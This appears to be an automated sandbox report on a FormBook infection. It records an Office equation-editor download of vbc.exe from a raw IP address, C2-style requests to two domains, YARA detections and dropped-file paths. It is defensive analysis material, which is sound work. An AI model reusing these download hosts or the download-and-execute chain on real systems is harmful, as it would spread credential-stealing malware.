Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000A.00000000.1013251551.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000000.1006808699.0000000006450000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.1013251551.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.1024716428.0000000007539000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1036517344.0000000007539000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.1037414892.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009836378.000000000869E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.1009597733.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026640673.0000000008617000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 0000000A.00000000.1038616558.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026858297.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009597733.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026640673.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009836378.000000000869E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.1003477696.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 0000000A.00000000.1033807788.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19CBAA30.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.employeebnsf.com

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03690401 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_03690401

Source: global traffic	HTTP traffic detected: GET /55/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.89.166Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ== HTTP/1.1Host: www.employeebnsf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 14 May 2022 13:12:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 13:12:24 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.166

Source: EQNEDT32.EXE, 00000002.00000002.969988460.0000000000669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com; equals www.linkedin.com (Linkedin)
Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EQNEDT32.EXE, 00000002.00000002.969988460.0000000000669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.27da9ec.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0126BA77	4_2_0126BA77
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EDC40	4_2_002EDC40
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EDC32	4_2_002EDC32
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E0708	4_2_002E0708
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0068E208	4_2_0068E208
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006843D0	4_2_006843D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006855B8	4_2_006855B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00683F29	4_2_00683F29
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00683FA8	4_2_00683FA8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00D50308	4_2_00D50308
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E0224	4_2_002E0224
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040927B	9_2_0040927B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00409280	9_2_00409280
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040DC20	9_2_0040DC20
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402D8F	9_2_00402D8F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D78F	9_2_0041D78F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041E7BB	9_2_0041E7BB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0126BA77	9_2_0126BA77
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0088E0C6	9_2_0088E0C6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008BD005	9_2_008BD005
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00893040	9_2_00893040
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008A905A	9_2_008A905A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0088E2E9	9_2_0088E2E9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00931238	9_2_00931238
Source: C:\Users\Public\vbc.exe	Code function: 9_2_009363BF	9_2_009363BF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0088F3CF	9_2_0088F3CF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008B63DB	9_2_008B63DB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00892305	9_2_00892305
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00897353	9_2_00897353
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008DA37B	9_2_008DA37B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008A1489	9_2_008A1489
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008C5485	9_2_008C5485
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008CD47D	9_2_008CD47D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008AC5F0	9_2_008AC5F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0089351F	9_2_0089351F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008D6540	9_2_008D6540
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00894680	9_2_00894680
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0089E6C1	9_2_0089E6C1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00932622	9_2_00932622
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008DA634	9_2_008DA634
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_02671238	11_2_02671238
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025CE2E9	11_2_025CE2E9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025D7353	11_2_025D7353
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_0261A37B	11_2_0261A37B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025D2305	11_2_025D2305
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025F63DB	11_2_025F63DB
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025CF3CF	11_2_025CF3CF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025E905A	11_2_025E905A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025D3040	11_2_025D3040
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025FD005	11_2_025FD005
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025CE0C6	11_2_025CE0C6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_02672622	11_2_02672622
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025DE6C1	11_2_025DE6C1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025D4680	11_2_025D4680
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_026057C3	11_2_026057C3
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025DC7BC	11_2_025DC7BC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_0265579A	11_2_0265579A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025E1489	11_2_025E1489
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_02605485	11_2_02605485
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025D351F	11_2_025D351F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025EC5F0	11_2_025EC5F0
